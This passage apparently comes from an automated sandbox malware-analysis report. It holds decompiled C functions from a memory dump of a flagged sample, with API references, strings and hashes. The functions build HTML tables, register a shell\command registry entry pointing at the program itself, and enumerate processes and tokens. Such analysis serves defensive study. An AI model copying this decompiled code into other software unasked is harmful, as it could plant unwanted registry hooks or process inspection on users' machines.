				void* _t78;
				void* _t79;
				void* _t80;
				void* _t81;

				E0040B550(0x8a00, __ecx);
				_v2052 = 0;
				memset( &_v2050, 0, 0x1fc);
				_v1540 = 0;
				memset( &_v1538, 0, 0x1fc);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fc);
				_t79 = _t78 + 0x24;
				if(_a20 != 0xffffffff) {
					_push(E0040ADC0(_a20,  &_v2564));
					_push(L" bgcolor=\"%s\"");
					_push(0xff);
					_push( &_v2052);
					L0040B1EC();
					_t79 = _t79 + 0x18;
				}
				if(_a24 != 0xffffffff) {
					_push(E0040ADC0(_a24,  &_v2564));
					_push(L"<font color=\"%s\">");
					_push(0xff);
					_push( &_v1540);
					L0040B1EC();
					wcscpy( &_v1028, L"</font>");
					_t79 = _t79 + 0x20;
				}
				_push( &_v2052);
				_push(L"<table border=\"1\" cellpadding=\"5\"><tr%s>\r\n");
				_push(0x3fff);
				_push( &_v35332);
				L0040B1EC();
				_t80 = _t79 + 0x10;
				E00407343(_a4, _a8,  &_v35332);
				_t51 = _a16;
				if(_t51 > 0) {
					_t73 = _a12 + 4;
					_a20 = _t51;
					do {
						_v516 = 0;
						memset( &_v514, 0, 0x1fc);
						_t54 =  *_t73;
						_t81 = _t80 + 0xc;
						if( *_t54 == 0) {
							_v516 = 0;
						} else {
							_push(_t54);
							_push(L" width=\"%s\"");
							_push(0xff);
							_push( &_v516);
							L0040B1EC();
							_t81 = _t81 + 0x10;
						}
						_push( &_v1028);
						_push( *((intOrPtr*)(_t73 - 4)));
						_push( &_v1540);
						_push( &_v516);
						_push(L"<th%s>%s%s%s\r\n");
						_push(0x3fff);
						_push( &_v35332);
						L0040B1EC();
						_t80 = _t81 + 0x1c;
						_t61 = E00407343(_a4, _a8,  &_v35332);
						_t73 = _t73 + 8;
						_t36 =  &_a20;
						 *_t36 = _a20 - 1;
					} while ( *_t36 != 0);
					return _t61;
				}
				return _t51;
			}

0x00407b65
0x00407b7c
0x00407b83
0x00407b91
0x00407b98
0x00407ba6
0x00407bad
0x00407bb2
0x00407bb9
0x00407bca
0x00407bcb
0x00407bd6
0x00407bdb
0x00407bdc
0x00407be1
0x00407be1
0x00407be8
0x00407bf9
0x00407bfa
0x00407c05
0x00407c0a
0x00407c0b
0x00407c1c
0x00407c21
0x00407c21
0x00407c2a
0x00407c2b
0x00407c36
0x00407c3b
0x00407c3c
0x00407c41
0x00407c51
0x00407c56
0x00407c5b
0x00407c65
0x00407c68
0x00407c6b
0x00407c74
0x00407c7b
0x00407c80
0x00407c82
0x00407c88
0x00407ca6
0x00407c8a
0x00407c8a
0x00407c8b
0x00407c96
0x00407c9b
0x00407c9c
0x00407ca1
0x00407ca1
0x00407cb3
0x00407cb4
0x00407cbd
0x00407cc4
0x00407cc5
0x00407cd0
0x00407cd5
0x00407cd6
0x00407cdb
0x00407ceb
0x00407cf0
0x00407cf3
0x00407cf3
0x00407cf3
0x00000000
0x00407cfc
0x00407d00

APIs

memset.MSVCRT ref: 00407B83
memset.MSVCRT ref: 00407B98
memset.MSVCRT ref: 00407BAD
_snwprintf.MSVCRT ref: 00407BDC
_snwprintf.MSVCRT ref: 00407C0B
wcscpy.MSVCRT ref: 00407C1C
_snwprintf.MSVCRT ref: 00407C3C
memset.MSVCRT ref: 00407C7B
_snwprintf.MSVCRT ref: 00407C9C
_snwprintf.MSVCRT ref: 00407CD6

Part of subcall function 0040ADC0: _snwprintf.MSVCRT ref: 0040ADE4

Strings

<th%s>%s%s%s, xrefs: 00407CC5
width="%s", xrefs: 00407C8B
<font color="%s">, xrefs: 00407BFA
<table border="1" cellpadding="5"><tr%s>, xrefs: 00407C2B
</font>, xrefs: 00407C16
bgcolor="%s", xrefs: 00407BCB

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintf$memset$wcscpy
String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
API String ID: 2000436516-3842416460
Opcode ID: d00ccfce514861463375abe2e6db6ffc98356b9832555c3fb27b3b8e17e2f823
Instruction ID: 17ce3237ebe69143205905a5a122d9f10e08837d2ebaecd13bb40ff2a02a5a8b
Opcode Fuzzy Hash: d00ccfce514861463375abe2e6db6ffc98356b9832555c3fb27b3b8e17e2f823
Instruction Fuzzy Hash: EA413371D40219AAEB20EB55CC86FAB737CFF45304F0440BAB918B6191D774AB948FA9

Uniqueness

Uniqueness Score: -1.00%

Function 00404415, Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 124
registryCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E00404415(void* __ecx, void* __eflags, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				void* _v24;
				intOrPtr _v28;
				short _v32;
				void _v2078;
				signed int _v2080;
				void _v4126;
				char _v4128;
				void _v6174;
				char _v6176;
				void _v8222;
				char _v8224;
				signed int _t49;
				short _t55;
				intOrPtr _t56;
				int _t73;
				intOrPtr _t78;

				_t76 = __ecx;
				E0040B550(0x201c, __ecx);
				_t73 = 0;
				if(E004043F8( &_v8, 0x2001f) != 0) {
					L6:
					return _t73;
				}
				_v6176 = 0;
				memset( &_v6174, 0, 0x7fe);
				_t78 = _a4;
				_push(_t78 + 0x20a);
				_push(_t78);
				_push(L"%s\\shell\\%s\\command");
				_push(0x3ff);
				_push( &_v6176);
				L0040B1EC();
				if(E00409ECC(_t76, _v8,  &_v6176,  &_v12) == 0) {
					_t49 = E00409EF4(_v12, 0x40c4e8, _t78 + 0x414);
					asm("sbb ebx, ebx");
					_t73 =  ~_t49 + 1;
					RegCloseKey(_v12);
					_v2080 = _v2080 & 0x00000000;
					memset( &_v2078, 0, 0x7fe);
					E00404AD9( &_v2080);
					if(_v2078 == 0x3a) {
						_t55 =  *L"C:\\"; // 0x3a0043
						_v32 = _t55;
						_t56 =  *0x40ccdc; // 0x5c
						_v28 = _t56;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_v32 = _v2080;
						if(GetDriveTypeW( &_v32) == 3) {
							_v4128 = 0;
							memset( &_v4126, 0, 0x7fe);
							_v8224 = 0;
							memset( &_v8222, 0, 0x7fe);
							_push(_a4 + 0x20a);
							_push(_a4);
							_push(L"%s\\shell\\%s");
							_push(0x3ff);
							_push( &_v8224);
							L0040B1EC();
							_push( &_v2080);
							_push(L"\"%s\",0");
							_push(0x3ff);
							_push( &_v4128);
							L0040B1EC();
							E00409F1A(_t76, _v8,  &_v8224,  &_v4128);
						}
					}
				}
				RegCloseKey(_v8);
				goto L6;
			}

0x00404415
0x0040441d
0x0040442c
0x00404435
0x004045b3
0x004045b7
0x004045b7
0x0040444b
0x00404452
0x00404457
0x00404460
0x00404461
0x00404462
0x0040446d
0x00404472
0x00404473
0x00404490
0x004044a5
0x004044b4
0x004044b6
0x004044b7
0x004044bd
0x004044cf
0x004044db
0x004044eb
0x004044f1
0x004044f6
0x004044f9
0x004044fe
0x00404506
0x00404507
0x00404508
0x00404510
0x00404521
0x00404532
0x00404539
0x00404547
0x0040454e
0x0040455b
0x0040455c
0x00404564
0x0040456f
0x00404570
0x00404571
0x0040457c
0x0040457d
0x00404588
0x00404589
0x0040458a
0x004045a0
0x004045a5
0x00404521
0x004044eb
0x004045ab
0x00000000

APIs

memset.MSVCRT ref: 00404452
_snwprintf.MSVCRT ref: 00404473

Part of subcall function 00409ECC: RegCreateKeyExW.ADVAPI32(?,?,00000000,0040C4E8,00000000,000F003F,00000000,?,?,?,?,0040448B,?,?,?,?), ref: 00409EEC

RegCloseKey.ADVAPI32(?,?,?,?,0002001F,?,?,0040390E,?), ref: 004045AB

Part of subcall function 00409EF4: wcslen.MSVCRT ref: 00409EF8
Part of subcall function 00409EF4: RegSetValueExW.ADVAPI32(004044AA,004044AA,00000000,00000001,004044AA,?,004044AA,?,0040C4E8,?,?,?,?,0002001F), ref: 00409F13

RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,0002001F,?,?,0040390E,?), ref: 004044B7
memset.MSVCRT ref: 004044CF

Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4

GetDriveTypeW.KERNEL32(?), ref: 00404518
memset.MSVCRT ref: 00404539
memset.MSVCRT ref: 0040454E
_snwprintf.MSVCRT ref: 00404571
_snwprintf.MSVCRT ref: 0040458A

Part of subcall function 00409F1A: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409F57

Strings

"%s",0, xrefs: 0040457D
C:\, xrefs: 004044F1
:, xrefs: 004044E3
%s\shell\%s\command, xrefs: 00404462
%s\shell\%s, xrefs: 00404564

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$Close_snwprintf$CreateDriveFileModuleNameTypeValuewcslen
String ID: "%s",0$%s\shell\%s$%s\shell\%s\command$:$C:\
API String ID: 486436031-734527199
Opcode ID: 1a4cdad823c9c3dfd4e992b957ed6e3c88109aac474059595a3945d4247565ab
Instruction ID: 27235bf79c6ca8476a2d09a82ed3c32274241934b1c07e7e02f5f4f3263a5ff1
Opcode Fuzzy Hash: 1a4cdad823c9c3dfd4e992b957ed6e3c88109aac474059595a3945d4247565ab
Instruction Fuzzy Hash: A4410EB294021CFADB20DB95CC85DDFB6BCEF44304F0084B6B608F2191E7789B559BA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040645E, Relevance: 26.3, APIs: 8, Strings: 7, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E0040645E(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, wchar_t* _a8) {
				void _v530;
				char _v532;
				void _v1042;
				long _v1044;
				long _v4116;
				char _v5164;
				void* __edi;
				void* _t27;
				void* _t38;
				void* _t44;

				E0040B550(0x142c, __ecx);
				_v1044 = 0;
				memset( &_v1042, 0, 0x1fc);
				_v532 = 0;
				memset( &_v530, 0, 0x208);
				E00404AD9( &_v532);
				_pop(_t44);
				E00405AA7( &_v5164);
				_t27 = E0040B04D( &_v5164,  &_v532);
				_t61 = _t27;
				if(_t27 != 0) {
					wcscpy( &_v1044,  &_v4116);
					_pop(_t44);
				}
				wcscpy(0x40fb90, _a8);
				wcscpy(0x40fda0, L"general");
				E00405FAC(_t61, L"TranslatorName", 0x40c4e8, 0);
				E00405FAC(_t61, L"TranslatorURL", 0x40c4e8, 0);
				E00405FAC(_t61, L"Version",  &_v1044, 1);
				E00405FAC(_t61, L"RTL", "0", 0);
				EnumResourceNamesW(_a4, 4, E0040620E, 0);
				EnumResourceNamesW(_a4, 5, E0040620E, 0);
				wcscpy(0x40fda0, L"strings");
				_t38 = E00406337(_t44, _t61, _a4);
				 *0x40fb90 =  *0x40fb90 & 0x00000000;
				return _t38;
			}

0x00406466
0x0040647d
0x00406484
0x00406499
0x004064a0
0x004064af
0x004064b4
0x004064bb
0x004064cd
0x004064d2
0x004064d4
0x004064e4
0x004064ea
0x004064ea
0x004064f3
0x00406503
0x00406514
0x00406525
0x0040653b
0x0040654e
0x00406568
0x00406572
0x0040657a
0x00406582
0x0040658a
0x00406596

APIs

memset.MSVCRT ref: 00406484
memset.MSVCRT ref: 004064A0

Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4

Part of subcall function 0040B04D: GetFileVersionInfoSizeW.VERSION(004064D2,?,00000000), ref: 0040B063
Part of subcall function 0040B04D: ??2@YAPAXI@Z.MSVCRT ref: 0040B07E
Part of subcall function 0040B04D: GetFileVersionInfoW.VERSION(004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B08E
Part of subcall function 0040B04D: VerQueryValueW.VERSION(00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0A1
Part of subcall function 0040B04D: VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0DE
Part of subcall function 0040B04D: _snwprintf.MSVCRT ref: 0040B0FE
Part of subcall function 0040B04D: wcscpy.MSVCRT ref: 0040B128

wcscpy.MSVCRT ref: 004064E4
wcscpy.MSVCRT ref: 004064F3
wcscpy.MSVCRT ref: 00406503
EnumResourceNamesW.KERNEL32(00406602,00000004,0040620E,00000000), ref: 00406568
EnumResourceNamesW.KERNEL32(00406602,00000005,0040620E,00000000), ref: 00406572
wcscpy.MSVCRT ref: 0040657A

Strings

RTL, xrefs: 00406549
TranslatorURL, xrefs: 00406520
general, xrefs: 004064F8
strings, xrefs: 00406574
Version, xrefs: 00406536
SFM, xrefs: 00406502
TranslatorName, xrefs: 0040650F

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: wcscpy$File$EnumInfoNamesQueryResourceValueVersionmemset$??2@ModuleNameSize_snwprintf
String ID: RTL$SFM$TranslatorName$TranslatorURL$Version$general$strings
API String ID: 3037099051-2314623505
Opcode ID: 7fb88fb6233af2db2d2511ed574e16bdb1e94482582c0cb23d08965938a53254
Instruction ID: e6de4c2f5101c47608bcafe23e33f00a3ad23f8f2b1db811bf874d9a9dfc23cd
Opcode Fuzzy Hash: 7fb88fb6233af2db2d2511ed574e16bdb1e94482582c0cb23d08965938a53254
Instruction Fuzzy Hash: ED21547294021875DB20B756DC4BECF3A6CEF44754F0105BBB508B21D2D7BC5A9489ED

Uniqueness

Uniqueness Score: -1.00%

Function 00409A94, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 154
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 44%

			E00409A94(long _a4, intOrPtr _a8) {
				int _v8;
				int _v12;
				int _v16;
				void* _v20;
				void* _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				char _v60;
				void _v315;
				char _v316;
				void _v826;
				char _v828;
				void _v1338;
				char _v1340;
				void* __esi;
				void* _t61;
				_Unknown_base(*)()* _t93;
				void* _t94;
				int _t106;
				void* _t108;
				void* _t110;

				_v828 = 0;
				memset( &_v826, 0, 0x1fe);
				_v1340 = 0;
				memset( &_v1338, 0, 0x1fe);
				_t110 = _t108 + 0x18;
				_t61 = OpenProcess(0x400, 0, _a4);
				_t113 = _t61;
				_v20 = _t61;
				if(_t61 == 0) {
					L11:
					if(_v828 == 0) {
						__eflags = 0;
						return 0;
					}
					_push( &_v828);
					_push( &_v1340);
					_push(L"%s\\%s");
					_push(0xff);
					_push(_a8);
					L0040B1EC();
					return 1;
				}
				_v8 = 0;
				_v24 = 0;
				E00408F92( &_v8, _t113, _t61, 8,  &_v24);
				_t106 = _v24;
				if(_t106 == 0) {
					_t32 =  &_v20; // 0x4059ec
					E00409555( *_t32,  &_v36,  &_v44,  &_v52,  &_v60);
					_v316 = 0;
					memset( &_v315, 0, 0xfe);
					_t110 = _t110 + 0x20;
					_v16 = 0xff;
					__eflags = E00409A46(0x41c4b4, _a4,  &_v316,  &_v16, _v36, _v32);
					if(__eflags == 0) {
						L9:
						CloseHandle(_v20);
						if(_v8 != 0) {
							FreeLibrary(_v8);
						}
						goto L11;
					}
					_push( &_v28);
					_push( &_a4);
					_push( &_v1340);
					_push( &_v12);
					_push( &_v828);
					_a4 = 0xff;
					_push( &_v316);
					L8:
					_v12 = 0xff;
					E0040906D( &_v8, _t117);
					goto L9;
				}
				_v316 = 0;
				memset( &_v315, 0, 0xff);
				_v12 = _t106;
				_t110 = _t110 + 0xc;
				_a4 = 0;
				if(E00408F72( &_v8) == 0) {
					goto L9;
				}
				_t93 = GetProcAddress(_v8, "GetTokenInformation");
				if(_t93 == 0) {
					goto L9;
				}
				_t94 =  *_t93(_v12, 1,  &_v316, 0xff,  &_a4);
				_t117 = _t94;
				if(_t94 == 0) {
					goto L9;
				}
				_push( &_v28);
				_push( &_v12);
				_push( &_v1340);
				_push( &_v16);
				_push( &_v828);
				_push(_v316);
				_v16 = 0xff;
				goto L8;
			}

0x00409ab0
0x00409ab7
0x00409ac8
0x00409acf
0x00409ad4
0x00409ae0
0x00409ae6
0x00409ae8
0x00409af0
0x00409c3a
0x00409c41
0x00409c67
0x00000000
0x00409c67
0x00409c49
0x00409c50
0x00409c51
0x00409c56
0x00409c57
0x00409c5a
0x00000000
0x00409c64
0x00409b00
0x00409b03
0x00409b06
0x00409b0b
0x00409b10
0x00409ba9
0x00409bac
0x00409bc1
0x00409bc7
0x00409bcc
0x00409bd8
0x00409bf0
0x00409bf2
0x00409c23
0x00409c26
0x00409c2f
0x00409c34
0x00409c34
0x00000000
0x00409c2f
0x00409bf7
0x00409bfb
0x00409c02
0x00409c06
0x00409c0d
0x00409c14
0x00409c17
0x00409c18
0x00409c1b
0x00409c1e
0x00000000
0x00409c1e
0x00409b1f
0x00409b25
0x00409b2a
0x00409b2d
0x00409b33
0x00409b3d
0x00000000
0x00000000
0x00409b4b
0x00409b53
0x00000000
0x00000000
0x00409b6a
0x00409b6c
0x00409b6e
0x00000000
0x00000000
0x00409b77
0x00409b7b
0x00409b82
0x00409b86
0x00409b8d
0x00409b8e
0x00409b94
0x00000000

APIs

memset.MSVCRT ref: 00409AB7
memset.MSVCRT ref: 00409ACF
OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00000000,00000000), ref: 00409AE0
_snwprintf.MSVCRT ref: 00409C5A

Part of subcall function 00408F92: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00408FA8

memset.MSVCRT ref: 00409B25
GetProcAddress.KERNEL32(?,GetTokenInformation), ref: 00409B4B
memset.MSVCRT ref: 00409BC7
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00409C26
FreeLibrary.KERNEL32(?,?,?,?,?,?,00000000,00000008,?,?,?,?,?,00000000,00000000), ref: 00409C34

Strings

Y@, xrefs: 00409BA9
%s\%s, xrefs: 00409C51
GetTokenInformation, xrefs: 00409B43

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$AddressProc$CloseFreeHandleLibraryOpenProcess_snwprintf
String ID: %s\%s$GetTokenInformation$Y@
API String ID: 3504373036-27875219
Opcode ID: fa417e9f9b304094a666d2d32e69bd60d5871efe85622ded7a3fc1f13b21d4e3
Instruction ID: eda2fbc970d96949daa6443d9737cdff9b2c135ab99c7c98679ff10ae30762ca
Opcode Fuzzy Hash: fa417e9f9b304094a666d2d32e69bd60d5871efe85622ded7a3fc1f13b21d4e3
Instruction Fuzzy Hash: E451C9B2C0021DBADB51EB95DC81DEFBBBDEB44344F1045BAB505B2191EA349F84CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00409172, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 49
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409172() {
				void* _t1;
				int _t2;
				struct HINSTANCE__* _t5;

				if( *0x4101bc != 0) {
					return _t1;
				}
				_t2 = E00405436(L"psapi.dll");
				_t5 = _t2;
				if(_t5 == 0) {
					L10:
					return _t2;
				} else {
					_t2 = GetProcAddress(_t5, "GetModuleBaseNameW");
					 *0x40f848 = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t5, "EnumProcessModules");
						 *0x40f840 = _t2;
						if(_t2 != 0) {
							_t2 = GetProcAddress(_t5, "GetModuleFileNameExW");
							 *0x40f838 = _t2;
							if(_t2 != 0) {
								_t2 = GetProcAddress(_t5, "EnumProcesses");
								 *0x40fa6c = _t2;
								if(_t2 != 0) {
									_t2 = GetProcAddress(_t5, "GetModuleInformation");
									 *0x40f844 = _t2;
									if(_t2 != 0) {
										 *0x4101bc = 1;
									}
								}
							}
						}
					}
					if( *0x4101bc == 0) {
						_t2 = FreeLibrary(_t5);
					}
					goto L10;
				}
			}

0x00409179
0x00409209
0x00409209
0x00409185
0x0040918a
0x0040918f
0x00409208
0x00000000
0x00409191
0x0040919e
0x004091a2
0x004091a7
0x004091af
0x004091b3
0x004091b8
0x004091c0
0x004091c4
0x004091c9
0x004091d1
0x004091d5
0x004091da
0x004091e2
0x004091e6
0x004091eb
0x004091ed
0x004091ed
0x004091eb
0x004091da
0x004091c9
0x004091b8
0x004091ff
0x00409202
0x00409202
0x00000000
0x004091ff

APIs

Part of subcall function 00405436: memset.MSVCRT ref: 00405456
Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492

GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040919E
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004091AF
GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 004091C0
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004091D1
GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004091E2
FreeLibrary.KERNEL32(00000000), ref: 00409202

Strings

EnumProcessModules, xrefs: 004091A9
GetModuleInformation, xrefs: 004091DC
GetModuleBaseNameW, xrefs: 00409198
EnumProcesses, xrefs: 004091CB
GetModuleFileNameExW, xrefs: 004091BA
psapi.dll, xrefs: 00409180

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$Library$Load$Freememsetwcscat
String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
API String ID: 1182944575-70141382
Opcode ID: d87044beb2f544c687dd7353a18839beb98a5be9ca02ea53753111702b61b9a8
Instruction ID: e8d56a808bd010e6a3fef0dff4ae07571f85a6d4972d2e5c8a67e4e39b9e152a
Opcode Fuzzy Hash: d87044beb2f544c687dd7353a18839beb98a5be9ca02ea53753111702b61b9a8
Instruction Fuzzy Hash: 33017175A41207BAD7205B656D88FB739E49B91B51B14413FE404F12D2DB7C88459F2C

Uniqueness

Uniqueness Score: -1.00%

Function 004090EE, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004090EE() {
				void* _t1;
				_Unknown_base(*)()* _t2;
				struct HINSTANCE__* _t4;

				if( *0x4101b8 != 0) {
					return _t1;
				}
				_t2 = GetModuleHandleW(L"kernel32.dll");
				_t4 = _t2;
				if(_t4 == 0) {
					L9:
					return _t2;
				}
				_t2 = GetProcAddress(_t4, "CreateToolhelp32Snapshot");
				 *0x40f83c = _t2;
				if(_t2 != 0) {
					_t2 = GetProcAddress(_t4, "Module32First");
					 *0x40f834 = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t4, "Module32Next");
						 *0x40f830 = _t2;
						if(_t2 != 0) {
							_t2 = GetProcAddress(_t4, "Process32First");
							 *0x40f5c4 = _t2;
							if(_t2 != 0) {
								_t2 = GetProcAddress(_t4, "Process32Next");
								 *0x40f828 = _t2;
								if(_t2 != 0) {
									 *0x4101b8 = 1;
								}
							}
						}
					}
				}
				goto L9;
			}

0x004090f5
0x00409171
0x00409171
0x004090fd
0x00409103
0x00409107
0x00409170
0x00000000
0x00409170
0x00409116
0x0040911a
0x0040911f
0x00409127
0x0040912b
0x00409130
0x00409138
0x0040913c
0x00409141
0x00409149
0x0040914d
0x00409152
0x0040915a
0x0040915e
0x00409163
0x00409165
0x00409165
0x00409163
0x00409152
0x00409141
0x00409130
0x00000000

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,00408C9F), ref: 004090FD
GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00409116
GetProcAddress.KERNEL32(00000000,Module32First), ref: 00409127
GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00409138
GetProcAddress.KERNEL32(00000000,Process32First), ref: 00409149
GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040915A

Strings

kernel32.dll, xrefs: 004090F8
Process32Next, xrefs: 00409154
Module32Next, xrefs: 00409132
CreateToolhelp32Snapshot, xrefs: 00409110
Module32First, xrefs: 00409121
Process32First, xrefs: 00409143

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$HandleModule
String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
API String ID: 667068680-3953557276
Opcode ID: 684ed8b1756a354eaa76eb9bf25297defa38c2621817bb94c0e51767f3dc11ec
Instruction ID: 22745fca4ee5753030f6263dae9a7fe791be1dfa5e14f8ddaef7bf0c79e2feda
Opcode Fuzzy Hash: 684ed8b1756a354eaa76eb9bf25297defa38c2621817bb94c0e51767f3dc11ec
Instruction Fuzzy Hash: D6F01D71F41313EAE761AB786E84F673AF85A85B44714403BA804F53D9EB7C8C46CA6C

Uniqueness

Uniqueness Score: -1.00%

Function 00409F9C, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E00409F9C(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, long long* _a12, long long _a16) {
				void _v514;
				char _v516;
				void _v1026;
				char _v1028;
				void _v1538;
				char _v1540;
				void* _t39;
				intOrPtr* _t50;
				void* _t61;

				_t50 = __ecx;
				_push(0x1fe);
				_push(0);
				if( *((intOrPtr*)(__ecx + 4)) == 0) {
					_v1540 = 0;
					memset( &_v1538, ??, ??);
					_v1028 = 0;
					memset( &_v1026, 0, 0x1fe);
					_v516 = 0;
					memset( &_v514, 0, 0x1fe);
					L0040B1EC();
					 *((long long*)(_t61 + 0x2c)) = _a16;
					L0040B1EC();
					_t39 =  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v1540,  &_v1028, 0xff,  &_v1028, 0xff,  &_v516,  &_v516, 0xff, L"%%0.%df", _a8);
					if (_t39 != 0) goto L3;
					return _t39;
				}
				_v516 = 0;
				memset( &_v514, ??, ??);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fe);
				L0040B1EC();
				 *((long long*)(_t61 + 0x20)) =  *_a12;
				L0040B1EC();
				return  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v516, 0x40c4e8, 0xff,  &_v516, 0xff,  &_v1028,  &_v1028, 0xff, L"%%0.%df", _a8);
			}

0x00409faf
0x00409fb4
0x00409fb5
0x00409fb6
0x0040a043
0x0040a04a
0x0040a058
0x0040a05f
0x0040a06d
0x0040a074
0x0040a08e
0x0040a099
0x0040a0ab
0x0040a0c9
0x0040a0ce
0x00000000
0x0040a0ce
0x00409fc3
0x00409fca
0x00409fd8
0x00409fdf
0x00409ff9
0x0040a006
0x0040a018
0x00000000

APIs

memset.MSVCRT ref: 00409FCA
memset.MSVCRT ref: 00409FDF
_snwprintf.MSVCRT ref: 00409FF9
_snwprintf.MSVCRT ref: 0040A018
memset.MSVCRT ref: 0040A04A
memset.MSVCRT ref: 0040A05F
memset.MSVCRT ref: 0040A074
_snwprintf.MSVCRT ref: 0040A08E
_snwprintf.MSVCRT ref: 0040A0AB

Strings

%%0.%df, xrefs: 00409FEC, 0040A081

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
